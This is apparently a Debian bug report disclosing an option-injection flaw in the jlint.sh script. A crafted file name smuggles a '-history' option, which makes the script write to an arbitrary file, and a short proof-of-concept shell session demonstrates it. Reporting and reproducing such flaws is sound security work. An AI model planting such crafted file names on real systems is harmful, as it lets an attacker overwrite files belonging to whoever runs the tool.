Package: jlint Version: 3.0-4.5 Tags: security Control: affects -1 check-all-the-things
The jlint.sh script is vulnerable to option injection. Running the script in a directory that contains untrusted files could trick it into writing to an arbitrary file.
Proof of concept: $ f=' -history /tmp/moo .class'; mkdir -p "${f%/*}"; touch "$f" $ ls -d /tmp/moo ls: cannot access /tmp/moo: No such file or directory $ jlint.sh Failed to read file '.// -history /tmp/moo .class' Failed to open file '.class' Verification completed: 0 reported messages. $ ls -d /tmp/moo /tmp/moo -- Jakub Wilk